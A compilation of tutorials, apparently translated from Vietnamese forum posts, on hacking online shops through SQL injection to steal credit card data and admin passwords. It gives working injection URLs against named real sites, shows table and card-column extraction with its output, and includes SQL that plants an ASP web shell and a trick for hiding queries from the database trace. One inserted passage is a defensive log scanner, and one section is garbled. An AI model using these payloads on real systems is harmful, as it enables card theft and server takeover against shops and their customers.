> just by looking you know what it does...
[Importing text files into tables]
Use 'bulk insert' to insert a text file into a table; create a simple table:
create table foo( line varchar(8000) )
then:
bulk insert foo from 'c:\inetpub\wwwroot\process_login.asp'
[Creating Text Files using BCP]
E.g.:
bcp "SELECT * FROM test..foo" queryout c:\inetpub\wwwroot\runcommand.asp -c -Slocalhost -Usa -Pfoobar
[ActiveX automation scripts in SQL Server]
Using 'wscript.shell'
e.g.:
declare @o int
exec sp_oacreate 'wscript.shell', @o out
exec sp_oamethod @o, 'run', NULL, 'notepad.exe'
In the query:
Username: '; declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod @o, 'run', NULL, 'notepad.exe'--
Using 'scripting.filesystemobject' to read a file:
declare @o int, @f int, @t int, @ret int
declare @line varchar(8000)
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'opentextfile', @f out, 'c:\boot.ini', 1
exec @ret = sp_oamethod @f, 'readline', @line out
while( @ret = 0 )
begin
print @line
exec @ret = sp_oamethod @f, 'readline', @line out
end
Creating an ASP script that executes a command:
declare @o int, @f int, @t int, @ret int
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'createtextfile', @f out, 'c:\inetpub\wwwroot\foo.asp', 1
exec @ret = sp_oamethod @f, 'writeline', NULL, '<% set o = server.createobject("wscript.shell"): o.run( request.querystring("cmd") ) %>'
These are methods you can use very effectively; be creative yourself, starting from these basic instructions.

HACKING SHOPS TO GET CREDIT CARDS WITH THE SQL INJECTION BUG, IN THE MOST DETAIL, WITH A SHOP TO PRACTISE ON

- Finding and identifying the SQL Injection bug:
To date there is still no keyword that helps you find shops using SQL, so to identify shop sites using SQL to hack, you usually use the keywords "shopping asp", "Product", "VP-ASP shopping"... After finding a shop using SQL, at an address whose ending looks like:
store/viewProduct.asp?ec_products=6620
we check for the bug by adding a (') after the (=), for example: http://ppmsddev.ctsg.com/store/viewProduct.asp?ec_products=6620'
If an error message appears (note the part in bold):
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string ' ORDER BY viewOrder ASC'.
/store/viewProduct.asp, line 114
it means this site has the SQL Injection bug and we can hack it.
- Structure of the hack command: victim url + command
Example: http://ppmsddev.ctsg.com/store/viewProduct.asp?ec_products=6620%20%2bconvert(int,(select%20top%201%20table_name%20from%20information_schema.tables))--sp_password
- Here are the 3 basic commands you need while hacking the SQL Injection bug:
1/ The command to get a table:
%20%2bconvert(int,(select%20top%201%20table_name%20from%20information_schema.tables))--sp_password
Used to get the next table:
%20%2bconvert(int,(select%20top%201%20table_name%20from%20information_schema.tables%20where%20table_name%20not%20in('table_already_obtained')))--sp_password
2/ The command to get a column:
%20%2bconvert(int,(select%20top%201%20column_name%20from%20information_schema.columns%20where%20table_name%20='table_to_get_columns_from'))--sp_password
Used to get the next column:
%20%2bconvert(int,(select%20top%201%20column_name%20from%20information_schema.columns%20where%20table_name%20='table_to_get_columns_from'%20and%20column_name%20not%20in('column_you_already_have')))--sp_password
3/ The command to extract data:
%20%2bconvert(int,(select%20top%201%20column_name%2B'/'%2bcolumn_name%20from%20table_to_extract_from))--sp_password
extract the next data on the same table by: where column_name not in
%20%2bconvert(int,(select%20top%201%20column_name%2B'/'%2bcolumn_name%20from%20table_to_extract_from%20where%20column_holding_data_already_obtained%20not%20in('data_already_obtained_from_the_column_named_before')))--sp_password
Note: you must use --sp_password so that the admin cannot detect it.
Here follows a practice example; this site has CC:

I/ Xem xt site sau: Cc bn c th copy cc on link mu cho chy trn IE theo di kt qu hng dn. http://ppmsddev.ctsg.com/store/viewProduct.asp?ec_products=6620' C li Injection SQL II/ Ly table: 1/ Ly table u tin: http://ppmsddev.ctsg.com/store/viewProduct.asp?ec_products=6620%20%2bconvert(int,(select%20top%20 1% 20table_name%20from%20information_schema.tables))--sp_password Kt qu: Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'donations' to a column of data type int. /store/viewProduct.asp, line 114 'donations' l table u tin 2/ Ly table k tip:http://ppmsddev.ctsg.com/store/viewProduct.asp?ec_products=6620%20%2bconvert(int,(select% 20top%20 1%20table_name%20from%20information_schema.tables%20where%20table_name%20not%20in ('donations' )))--sp_password Kt qu: Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'Editor' to a column of data type int. /store/viewProduct.asp, line 114 'Editor' l table th 2 3/ Table th 3: http://ppmsddev.ctsg.com/store/viewProduct.asp?ec_products=6620%20%2bconvert(int,(select%20top%20 1% 20table_name%20from%20information_schema.tables%20where%20table_name%20not%20in ('donations' ,'Editor')))--sp_password Kt qu: Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'bills' to a column of data type int. /store/viewProduct.asp, line 114 V cc bn lm tng t ly ht table, n khi khng xut hin thm table l ht. 
Kt qu: http://ppmsddev.ctsg.com/store/viewProduct.asp?ec_products=6620%20%2bconvert(int,(select%20top%20 1% 20table_name%20from%20information_schema.tables%20where%20table_name%20not%20in ('donations' ,'Editor','bills','bills_20040213','billsCandidate s','billsCandidates_20040213','billsCandidatesImpo rt','candidates','candidates_20040213','candidates New','contribute','dtproperties','ec_categories',' ec_orders','ec_priceBreaks','ec_products','ec_regi on','ec_shippers','ec_shippingOrders','ec_supplier s','ec_territory','Editor_letters','Editor_queue', 'Editor_recipients','emailUpdates','MinnesotaHouse RollCallVotes','MinnesotaSenateRollCallVotes','off ices','parties','party','Postcards','PostcardsBlac klist','ppmsd','sbEntries','siteSection','storetem p','stories','storyCategories','subjects','syscons traints','syssegments','tblConstitutionalOfficerSl ate','tblConstitutionalOfficerSlate$','tblStateLeg 2002_Query','users','users_choice','vw_contribute_ pending','vw_contribute_processed')))--sp_password II/ Ly column: Ch cc table cha d liu quan trng lin quan n CC v pass admin thng c tn: orders, user, tbloders, tbluser...

1/ Exploiting the first column of the table 'ec_orders':
http://ppmsddev.ctsg.com/store/viewProduct.asp?ec_products=6620%20%2bconvert(int,(select%20top%201%20column_name%20from%20information_schema.columns%20where%20table_name%20='ec_orders'))-sp_password
Result:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'firstname' to a column of data type int.
/store/viewProduct.asp, line 114
'firstname' is the first column of the table 'ec_orders'.
2/ Getting the next column:
http://ppmsddev.ctsg.com/store/viewProduct.asp?ec_products=6620%20%2bconvert(int,(select%20top%201%20column_name%20from%20information_schema.columns%20where%20table_name%20='ec_orders'%20and%20column_name%20not%20in('firstname')))--sp_password
Result:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'lastname' to a column of data type int.
/store/viewProduct.asp, line 114
3/ Do the same until every column of this table has been exploited. Result:
http://ppmsddev.ctsg.com/store/viewProduct.asp?ec_products=6620%20%2bconvert(int,(select%20top%201%20column_name%20from%20information_schema.columns%20where%20table_name%20='ec_orders'%20and%20column_name%20not%20in('firstname','lastname','email','orgName','address','city','state','zip','tele_areacode','tele_first','tele_last','credit_card','card_number','ExpDate_month','ExpDate_year','timestamp','shippedDate','orderNumber','shipped','billing_firstname','billing_lastname'lastname','billing_email','billing_orgName','billing_address','billing_city','billing_state','billing_zip','billing_tele_areacode','billing_tele_first','billing_tele_last','nameOnCard','survey_nameOfPerson','survey_materials','survey_emailAddress','survey_findMethod','survey_interested','po_number')))--sp_password

III/ Exploiting the CC: note the important columns of the table 'ec_orders', which were printed in bold.
1/ Exploiting 'credit_card','card_number' in 'ec_orders':
http://ppmsddev.ctsg.com/store/viewProduct.asp?ec_products=6620%20%2bconvert(int,(select%20top%201%20credit_card%2b'/'%2bcard_number%20from%20ec_orders))--sp_password
Use the link above to see the result (because of the forum rules the result is not shown here). Likewise, to get the next result:
http://ppmsddev.ctsg.com/store/viewProduct.asp?ec_products=6620%20%2bconvert(int,(select%20top%201%20credit_card%2b'/'%2bcard_number%20from%20ec_orders%20where%20card_number%20not%20in('card_number-obtained-above')))--sp_password
How many columns you query is up to you. Using %2b'/'%2b means the results are displayed separated by a slash (/) so they are easier to read. Note: the more columns you query, the lower the chance of getting data back, because the statement cannot cope with empty fields that hold no data. It is best to try a single column first to check the result, then add the next column to the query.

The complete query for the ec_orders table of this site (use this link to see the result):
http://ppmsddev.ctsg.com/store/viewProduct.asp?ec_products=6620%20%2bconvert(int,(select%20top%201%20firstname%2b'/'%2blastname%2b'/'%2bemail%2b'/'%2borgName%2b'/'%2baddress%2b'/'%2bcredit_card%2b'/'%2bcard_number%2b'/'%2bExpDate_month%2b'/'%2bExpDate_year%2b'/'%2bnameOnCard%2b'/'%2bcity%2b'/'%2bstate%2b'/'%2bzip%20from%20ec_orders))--sp_password
You can do the same with the other tables to get admin, customer... data.

IV/ Some lessons from hacking shops via SQL injection:
- After discovering an SQL-injectable site, you should buy some item on it to check the following: whether it allows buying with a CC, whether the CC has cvv2, whether online payment happens on the vulnerable site or on another site, whether customers log in with a password to buy... all the information around buying and selling, to decide whether this site is worth hacking.
- Exploit creditcard_number first; if there is none, the site has probably fixed its data or uses another site for payment.
- When you have the admin's user/pass, use it to log in to the server over ftp, e.g. ftp://ppmsddev.ctsg.com/; with luck you can take over the server and not waste much effort hacking.
- These sites often hide the admin login link; you have to be patient looking for it, and use a URL scanner on the page to find the login page.
- In some cases a site is injectable but shows the error page "The page cannot be displayed"; look lower down to spot the SQL injection error message, e.g.:
The page cannot be displayed
There is a problem with the page you are trying to reach and it cannot be displayed.
...................
HTTP 500.100 - Internal Server Error - ASP error
Internet Information Services
Technical Information (for support personnel)
Error Type:
Provider ('80040e14')
Type mismatch.
/shopping/shop$db.asp, line 875
Browser Type: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Page: GET /shopping/shopdisplayproducts.asp
Time: Friday, February 27, 2004, 11:20:19 PM
More information:
Microsoft Support http://www.microsoft.com/ContentRedirect.asp?prd=iis&sbp=&pver=5.0&ID=500;100&cat=Provider&os=&over=&hrd=&Opt1=&Opt2=%2D2147352571&Opt3=Type+mismatch%2E

TUTORIAL OF UNKNOWN AUTHOR


This bug has actually been around for a long time, but do you know why there are still so many of them? Lots and lots. Simply because people are lazy. There are many ways to work a Jet database, but this one is easy for a newbie to understand and needs nothing more than appending the statement below to the vulnerable URL. Let's start.
1. Go to Google and search for the keyword: proddetail.asp?prod=* (here * can be replaced by any number: 1, 2, 3... or 100, 200, whatever).
2. Add a ' to find a vulnerable site.
3. Recognise a vulnerable site by the following line:
Microsoft JET Database Engine error '80040e14'
The number of columns in the two selected tables or queries of a union query do not match.
/Retail/vsadmin/inc/incproddetail.asp, line 33
4. A concrete example: I tested the site http://www.kleer-fax.com/proddetail.asp?prod=23305
Add a ' after 23305, ok? The error appears:
Microsoft JET Database Engine error '80040e14'
Syntax error in string in query expression 'pId='23305'''.
/proddetail.asp, line 246
Let's begin exploiting it. Find its table and column with the following query:
%27union%20select%201%20from%20admin
After appending the statement to the link we get: http://www.kleer-fax.com/proddetail.asp?prod=23305%27union%20select%201%20from%20admin
We get:
Microsoft JET Database Engine error '80040e14'
The number of columns in the two selected tables or queries of a union query do not match.
/proddetail.asp, line 246
Wrong? No, wait: that error tells us a column holding admin information does exist, so keep checking. Add ,2 after select%201:
http://www.kleer-fax.com/proddetail.asp?prod=23305%27%20union%20select%201,2%20from%20admin
It reports the same thing as above:
Microsoft JET Database Engine error '80040e14'
The number of columns in the two selected tables or queries of a union query do not match.
/proddetail.asp, line 246

If you still haven't found what you need, keep appending ,3,4,5,6,7,8 and so on until:
Home : All Products
4-5-6
Item: 3
List Price: $9.00 USD
7
201
Hehe, this is exactly what we were looking for. The run of numbers we had to add ends at 14 (lucky it only went to 14; don't give up). Note the 7 and the 201: those are the two columns holding the admin information (user/pass). We substitute the queries for the admin user and password into positions 201 and 7. Exhausting :( all the way to 201; anyone who wants to learn, count to 201 :D To make testing easier for you, I'll assume 201 is 1, so the query becomes:
http://www.kleer-fax.com/proddetail.asp?prod=23305%27and%201=0%20union%20select%201%2c2%2c%27username:%20%27%2badminuser%2c4%2c5%2c6%2c%27password:%20%27%2badminpassword%2c8%2c9%2c10%2c11%2c12%2c13%2c14%20from%20admin
So count to 200, and at 201 substitute adminpassword :D. The following lines then appear:
Please choose from the list below.
Change username / password:
Edit admin settings:
Edit categories:
Edit products:
Logout:
Note: only use and 1=0 once the union goes through without reporting an error.

TUTORIAL FROM HCV


---- This is an advanced method for the SQL bug in VP-ASP shops. With the help of an admin in HCV, Quoc would like to share it with you.
**********************************************
Vuln: SQL Inject in VP-ASP all of version
Exploiter: Unknown
Tool: Mozilla Firefox Download
**********************************************
First you have to find the victim's shop.
Tool: http://google.com/
Keyword: shopdisplayproducts.asp? shopaddtocart.asp? shopexd.asp
Find more keys for yourselves. For this example I picked the shop
https://www.sfp.net/shopaddtocart.asp?catalogid=1
Then we add a ' after the link, giving
https://www.sfp.net/shopaddtocart.asp?catalogid=1'
Ok, let's start looking for the admin link.
---- To find the first character of the admin link, append this statement to the link above:
https://www.sfp.net/shopaddtocart.asp?catalogid=1%20or%201=(select%20fieldname%20from%20configuration%20where%20left(fieldname,10)='xadminpage'%20and%20left(fieldvalue,1)='s')
We keep changing the value 's' until it matches the first character of the link. Here I found the character 'a'.
---- Next, find the length of the admin link (usually from 5 upwards, because the admin link has .asp appended, e.g. admin.asp <--- 9 characters):
https://www.sfp.net/shopaddtocart.asp?catalogid=1%20or%201=(select%20fieldname%20from%20configuration%20where%20left(fieldname,10)='xadminpage'%20and%20left(fieldvalue,1)='a' and len(fieldvalue)=5)
Keep changing the value 5 to other numbers until you hit the right length of the admin link. Here I found 15 characters.
---- Next, find the remaining characters of the admin link:
https://www.sfp.net/shopaddtocart.asp?catalogid=1%20or%201=(select%20fieldname%20from%20configuration%20where%20left(fieldname,10)='xadminpage'%20and%20left(fieldvalue,2)='ad')

Keep changing the value in the left command to match each character position of the admin link. Once the admin link is found, we have adminonline.asp.
---- Next, find the username. Append this query to the link:
%20or%201=(select%20fldusername%20from%20tbluser%20where%20left(fldusername,1)='q')
The query then becomes:
https://www.sfp.net/shopaddtocart.asp?catalogid=1%20or%201=(select%20fldusername%20from%20tbluser%20where%20left(fldusername,1)='s')
Here the first character is 's'.
---- Next, find the length of the username:
https://www.sfp.net/shopaddtocart.asp?catalogid=1%20or%201=(select%20fldusername%20from%20tbluser%20where%20left(fldusername,1)='s' and len(fldusername)=3)
We find that the username is "sfp".
---- Find the password. Same as above, just replace fldusername with fldpassword. Append this query to the link:
%20or%201=(select%20fldpassword%20from%20tbluser%20where%fldusername='sfp' and left(fldpassword,1)='p')
This finds the password matching the username "sfp". The first character is 'p'. The query then becomes:
https://www.sfp.net/shopaddtocart.asp?catalogid=1%20or%201=(select%20fldpassword%20from%20tbluser%20where%fldusername='sfp' and left(fldpassword,1)='p')
Here the first character is 'p'.
---- Next, find the length of the password:
https://www.sfp.net/shopaddtocart.asp?catalogid=1%20or%201=(select%20fldpassword%20from%20tbluser%20where%fldusername='sfp' and left(fldpassword,1)='p' and len(fldpassword)=11)
Once found, we have the pass 'performance'.
*************************************************************
Finally, when everything is done, we have the admin link http://www.sfp.net/adminonline.asp
user: sfp
pass: performance
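The defender's counterpart to the three tutorials above (error-based convert(int,(select ...)) enumeration of information_schema, union probing, and the boolean-blind left()/len() walk), as an added example that is not part of this ebook or of any shop it names: a small Python scanner that reads IIS W3C log lines, URL-decodes the query string, flags the probing techniques by pattern, and counts flagged requests and HTTP 500 responses per source address. The field layout, the log lines and the IP addresses are constructed for the example.

```python
"""Flag SQL-injection probing in IIS W3C web-server logs.

Added example, not code from this ebook or from any shop it names.
Assumed '#Fields:' layout: date time c-ip cs-method cs-uri-stem cs-uri-query
sc-status. The log lines and addresses below are constructed.
"""
import re
from collections import Counter
from urllib.parse import unquote_plus

# One regex per probing technique the tutorials above show. They run on the
# URL-decoded query string, so %20/%27/%2b encodings do not hide anything.
SIGNATURES = {
    "error-based cast": re.compile(r"convert\s*\(\s*int\s*,\s*\(?\s*select\b", re.I),
    "schema walk": re.compile(r"information_schema\s*\.\s*(tables|columns)\b", re.I),
    "union probe": re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
    "having 1=1": re.compile(r"\bhaving\s+1\s*=\s*1\b", re.I),
    "boolean blind": re.compile(r"\bor\s+1\s*=\s*\(\s*select\b", re.I),
    "sp_password suffix": re.compile(r"sp_password", re.I),
}

# Constructed sample log: two error-based schema walks, one blind probe,
# one normal request and one union probe.
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2004-02-27 23:20:19 203.0.113.7 GET /store/viewProduct.asp ec_products=6620%20%2bconvert(int,(select%20top%201%20table_name%20from%20information_schema.tables))--sp_password 500
2004-02-27 23:20:31 203.0.113.7 GET /store/viewProduct.asp ec_products=6620%20%2bconvert(int,(select%20top%201%20table_name%20from%20information_schema.tables%20where%20table_name%20not%20in('donations')))--sp_password 500
2004-02-27 23:21:03 203.0.113.7 GET /shopaddtocart.asp catalogid=1%20or%201=(select%20fieldname%20from%20configuration%20where%20left(fieldname,10)='xadminpage'%20and%20left(fieldvalue,1)='a') 200
2004-02-27 23:22:10 198.51.100.4 GET /store/viewProduct.asp ec_products=6620 200
2004-02-27 23:22:40 198.51.100.4 GET /proddetail.asp prod=23305%27%20union%20select%201,2%20from%20admin 500
"""


def parse_line(line):
    """Split one W3C record into a dict; None for comment or short lines."""
    if not line.strip() or line.startswith("#"):
        return None
    parts = line.split()
    if len(parts) < 7:
        return None
    date, time, ip, method, stem, query, status = parts[:7]
    return {"time": f"{date} {time}", "ip": ip, "method": method, "stem": stem,
            "query": unquote_plus(query) if query != "-" else "",
            "status": int(status)}


def classify(query):
    """Names of every signature that matches a decoded query string."""
    return [name for name, rx in SIGNATURES.items() if rx.search(query)]


def scan_log(text):
    """One finding per request that matches at least one signature."""
    findings = []
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        hits = classify(rec["query"])
        if hits:
            rec["hits"] = hits
            findings.append(rec)
    return findings


def suspicious_ips(findings, min_hits=2):
    """Addresses with at least min_hits flagged requests. Error-based
    enumeration pulls one table or column per request, so the count climbs fast."""
    counts = Counter(f["ip"] for f in findings)
    return {ip: n for ip, n in counts.items() if n >= min_hits}


def error_burst(text, min_errors=2):
    """Addresses that drew at least min_errors HTTP 500 responses. Error-based
    injection breaks the page on purpose, so 500s cluster by source."""
    counts = Counter(r["ip"] for r in map(parse_line, text.splitlines())
                     if r and r["status"] == 500)
    return {ip: n for ip, n in counts.items() if n >= min_errors}


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["time"], f["ip"], f["stem"], f["status"], ", ".join(f["hits"]))
    print("repeat offenders:", suspicious_ips(scan_log(SAMPLE_LOG)))
    print("500 bursts:", error_burst(SAMPLE_LOG))
```

The web-server log is the right place to look because the `sp_password` suffix the tutorials append is there for a reason: SQL Server's trace and Profiler replace the text of any batch containing that string with a comment, so the injected statements never appear in the database-side trace. The `--sp_password` and `convert(int,(select` patterns are also far easier to match than the generic single quote that starts every probe.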

TUTORIAL BY CONGLAPHVA
- Go to www.google.com.vn and type:
- allinurl:'/product.asp/'
- allinurl:'/product.asp?productid/'
- allinurl:'/logint.asp'
- Now we get to work. I pick a site to hack: http://www.victim.com/store/category.asp?CategoryID=83
- Check for the bug: http://www.victim.com/store/category.asp?CategoryID=83' (we only need to type a ' to test for the bug)
- Result:
Provider for SQL Server error '80040e14'
Unclosed quotation mark before the character string ''.
/store/includes/common.asp, line 2116
1. Gathering the data structure: get the first table
http://www.victim.com/store/category.asp?CategoryID=83%20and%201=convert(int,(select%20top%201%20table_name%20from%20information_schema.tables))--sp_password
Result:
Provider for SQL Server error '80040e07'
Syntax error converting the nvarchar value 'StateTaxes' to a column of data type int.
/store/includes/common.asp, line 2116

So the first table is StateTaxes. Get the second table:
http://www.victim.com/store/category.asp?CategoryID=82%20and%201=convert(int,(select%20top%201%20table_name%20from%20information_schema.tables%20where%20table_name%20not%20in%20('StateTaxes')))-sp_password

Result:
Provider for SQL Server error '80040e07'
Syntax error converting the nvarchar value 'BillingAddresses' to a column of data type int.
/store/includes/common.asp, line 2116

So the second table is BillingAddresses. Get the third table:
http://www.victim.com/store/category.asp?CategoryID=82%20and%201=convert(int,(select%20top%201%20table_name%20from%20information_schema.tables%20where%20table_name%20not%20in%20('StateTaxes','BillingAddresses')))--sp_password
Result:
Provider for SQL Server error '80040e07'
Syntax error converting the nvarchar value 'Categories' to a column of data type int.
/store/includes/common.asp, line 2116
Keep taking the result for the third table (the blue text) and appending it after table 3, and you get every table of this site. E.g.:
http://www.victim.com/store/category.asp?CategoryID=82%20and%201=convert(int,(select%20top%201%20table_name%20from%20information_schema.tables%20where%20table_name%20not%20in%20('StateTaxes','BillingAddresses','Categories')))--sp_password
- And here is the full list of tables of this site:
http://www.victim.com/store/category.asp?CategoryID=83%20and%201=convert(int,(select%20top%201%20table_name%20from%20information_schema.tables%20where%20table_name%20not%20in%20('StateTaxes','BillingAddresses','Categories','Countries','CreditCards','Discounts','dtproperties','Groups','homeblurb','ItemGroups','Items','Manufacturers','Members','OrderItems','OrderItemsShipped','Orders','SavedCart','SavedCartItems','Secure','SessionData','Settings','SettingsFreeShippingCountries'.'ShippingAddresses')))--sp_password
CCs are usually kept in the Orders or creditcard tables; here I pick Orders to hack. Get the first column:
http://www.victim.com/store/category.asp?CategoryID=83%20and%201=convert(int,(select%20top%201%20column_name%20from%20information_schema.columns%20where%20table_name=('Orders')))--sp_password
Result:
Provider for SQL Server error '80040e07'
Syntax error converting the nvarchar value 'OrderID' to a column of data type int.
/store/includes/common.asp, line 2116

Provider for SQL Server error '80040e07'
Syntax error converting the nvarchar value 'DateCreated' to a column of data type int.
/store/includes/common.asp, line 2116

We take the columns of this table one by one, with the following result:
http://www.victim.com/store/category.asp?CategoryID=83%20and%201=convert(int,(select%20top%201%20column_name%20from%20information_schema.columns%20where%20table_name=('Orders')%20and%20column_name%20not%20in%20('OrderID','DateCreated','MemberID','ShippingMethod','Company','FirstName','LastName','Address1','Address2','City','State','Zip','ForeignAddress','Country','Phone','Fax','Email','CardName','CardType','CardNumber','ExpirationDate','CardAddress','CardZip','ShippingAddress1','SubTotal','Discount','DiscountDescription','Tax','Shipping','OrderTotal','PONumber','ResaleNumber','Handling','Comments','Referer','StoreName','ShippingCompany','ShippingFirstName','ShippingLastName','ShippingAddress2','ShippingCity','ShippingState','ShippingZip','ShippingForeignAddress','ShippingCountry','ShippingPhone','ShippingFax','CardVerification','CardVerificationNone','CardVerificationRead','PhoneOrder','FREEShippingMethod')))--sp_password

We take the data from these columns. The important columns are usually First/Last name/Address1/city/state/zip/Country/phone/fax/email/cardname/cardtype/Cardnumber/ExpirationDate/CVV2 (this site has no cvv2, though). -> That many is surely confusing, right? Follow this link and you get the cc:
http://www.victim.com/store/category.asp?CategoryID=82%20and%201=convert(int,(select%20top%201%20CardName%2b'/'%2bAddress1%2b'/'%2bCity%2b'/'%2bState%2b'/'%2bZip%2b'/'%2bPhone%2b'/'%2bCountry%2b'/'%2bCardNumber%2b'/'%2bExpirationDate%20from%20Orders))--sp_password

Whatever information you need, just insert /'%2b******%2b'/ for it. Having found the first cc, use this link to get the second and carry on:
http://www.victim.com/store/category.asp?CategoryID=82%20and%201=(select%20top%201%20CardName%2b%27/%27%2bAddress1%2b%27/%27%2bCity%2b%27/%27%2bState%2b%27/%27%2bZip%2b%27/%27%2bPhone%2b%27/%27%2bCountry%2b%27/%27%2bCardNumber%2b%27/%27%2bExpirationDate%20from%20Orders%20where%20CardNumber%20not%20in('XXXXXXXXXXXXXXX')%20)
To get the second cc, take the number of the card you already have and put it into the link above in place of 'XXXXXXXXXXXXXXXX'.

TUTORIAL BY SEAMOUN
I see many of you are interested in hacking VPASP shops, so I'm writing a piece for reference; although it is old, I find plenty of sites still have this bug. VPASP, needless to say, is a Shopping Cart. The versions with the SQL-Injection bug are 4.5 and 5.0; for the newer versions I don't have the source, so I can't see whether they are still vulnerable. Because VPASP usually uses an MS Access database, cutting the statement short as on SQL-Server is impossible, so the only way is to combine SQL statements (union) to get the result. Follow these steps:
Step 1: Go to Google.com and search for: allinurl: shopdisplaycategories.asp. You'll see a whole pile of sites. Check the links to see whether they have the SQL-Injection bug.
Step 2: In VPASP 4.5 the bug is in shopdisplaycategories.asp and shopdisplayproducts.asp. VPASP 5.0 fixed those two files, but one place is still vulnerable: shopexd.asp. Take this site: http://www.hopscotchdressingup.co.uk/store/shopdisplayproducts.asp?id=8'&cat=Halloween. Although we add ' at shopdisplayproducts.asp?id=8', there is no error. We try the next link: http://www.hopscotchdressingup.co.uk/store/shopexd.asp?id=149'. It produces the error HTTP 500 - Internal server error in Internet Explorer.
Step 3: We combine statements to get the username and password values as follows:
Original link: http://www.hopscotchdressingup.co.uk/store/shopexd.asp?id=149
Combined-query link: http://www.hopscotchdressingup.co.uk/store/shopexd.asp?id=-1 union select catalogid,ccode,fldusername%2b'/'%2bfldpassword,cdescription,cprice,ccategory,cdescurl,features,cimageurl,cstock,weight,mfg,pother1,pother2,pother3,subcategoryid,retailprice,specialoffer,category,buttonimage,cdateavailable,allowusertext,pother4,pother5,userid,keywords,template,extendedimage,extendeddesc,selectlist,level3,level4,level5,minimumquantity,supplierid,crossselling,hide,productmatch,customermatch,orderattachment,orderdownload,groupfordiscount,clanguage,points,pointstobuy,price2,price3,billprice,billinstallments,billinstallmenttype,billinterval,maximumquantity,frontpage from products,tbluser where catalogid=149
You'll ask where that heap of stuff in the link above came from. Heh, only with the VPASP source can you know which fields the products table has; then you build the statement for those fields yourself and replace the product-name field with the username and password fields. The reason we set id=-1 is to cut off the first SQL statement so that, in the union, the second SQL statement is what gets executed. After the union we get the user and password "Sy87XXXXX/gL37ytXXXXX", the two values substituted in place of the product name. So we have the admin's user and password. Great, log in at shopadmin.asp! Usually the Admin Control Panel file is shopadmin.asp, if it hasn't been renamed.
Step 4: We go to http://www.hopscotchdressingup.co.uk/store/shopadmin.asp to see what happens. Damn! The file has been renamed. What now? Just combine statements again to get the new file name. With the same link http://www.hopscotchdressingup.co.uk/store/shopexd.asp?id=149 we combine statements as follows to get the name of the Admin Control Panel file:
http://www.hopscotchdressingup.co.uk/store/shopexd.asp?id=-1 union select catalogid,ccode,fieldvalue,cdescription,cprice,ccategory,cdescurl,features,cimageurl,cstock,weight,mfg,pother1,pother2,pother3,subcategoryid,retailprice,specialoffer,category,buttonimage,cdateavailable,allowusertext,pother4,pother5,userid,keywords,template,extendedimage,extendeddesc,selectlist,level3,level4,level5,minimumquantity,supplierid,crossselling,hide,productmatch,customermatch,orderattachment,orderdownload,groupfordiscount,clanguage,points,pointstobuy,price2,price3,billprice,billinstallments,billinstallmenttype,billinterval,maximumquantity,frontpage from products,configuration where fieldname='xadminpage' and catalogid=149
After running it we get the Admin Control Panel file name hopoff.asp. So we can reach the Admin file: http://www.hopscotchdressingup.co.uk/store/hopoff.asp.
Note: if the Admin Control Panel presents two password fields, then either sit and sigh or go find another site. The second password is a constant, so it cannot be obtained by combining statements. To get it you'd have to e-mail the admin and ask what the second password is, since I already have your first one!!!
Hee hee, for VPASP 4.5 do the same as above; the only difference is where the statements to get the username, password and Admin Control Panel file name are combined. For example: http://<vulnerable-site>/shopdisplaycategories.asp?id=1. The combined statement to get the username, password and admin file name is:
http://<vulnerable-site>/shopdisplaycategories.asp?id=1 union select catalogid,ccode,fldusername%2b':'%2bfldpassword,cdescription,cprice,ccategory,cdescurl,features,cimageurl,cstock,weight,mfg,pother1,pother2,pother3,subcategoryid,retailprice,specialoffer,category,buttonimage,cdateavailable,allowusertext,pother4,pother5,userid,keywords,template,extendedimage,extendeddesc,selectlist,level3,level4,level5,minimumquantity,supplierid,crossselling,hide,productmatch,customermatch,orderattachment,orderdownload,groupfordiscount,clanguage,points,pointstobuy,price2,price3 from products,tbluser where 1=1 or 1=1

http://<vulnerable-site>/shopdisplaycategories.asp?id=1 union select catalogid,ccode,fieldvalue,cdescription,cprice,ccategory,cdescurl,features,cimageurl,cstock,weight,mfg,pother1,pother2,pother3,subcategoryid,retailprice,specialoffer,category,buttonimage,cdateavailable,allowusertext,pother4,pother5,userid,keywords,template,extendedimage,extendeddesc,selectlist,level3,level4,level5,minimumquantity,supplierid,crossselling,hide,productmatch,customermatch,orderattachment,orderdownload,groupfordiscount,clanguage,points,pointstobuy,price2,price3 from products,tbluser,configuration where fieldname='xadminpage'
A VPASP site on an SQL-Server database is very easy to exploit, as follows:
http://<vulnerable-site>/shopdisplaycategories.asp?id=1 and%201=convert(int,(select%20top%201%20fldusername%2b'/'%2bfldpassword%20from%20tbluser))-sp_password
http://<vulnerable-site>/shopdisplaycategories.asp?id=1 and%201=convert(int,(select top 1 fieldvalue from configuration where fieldname='xadminpage'))--sp_password
PS: When you practise, don't wreck their sites!

TUTORIAL BY GAMMA95
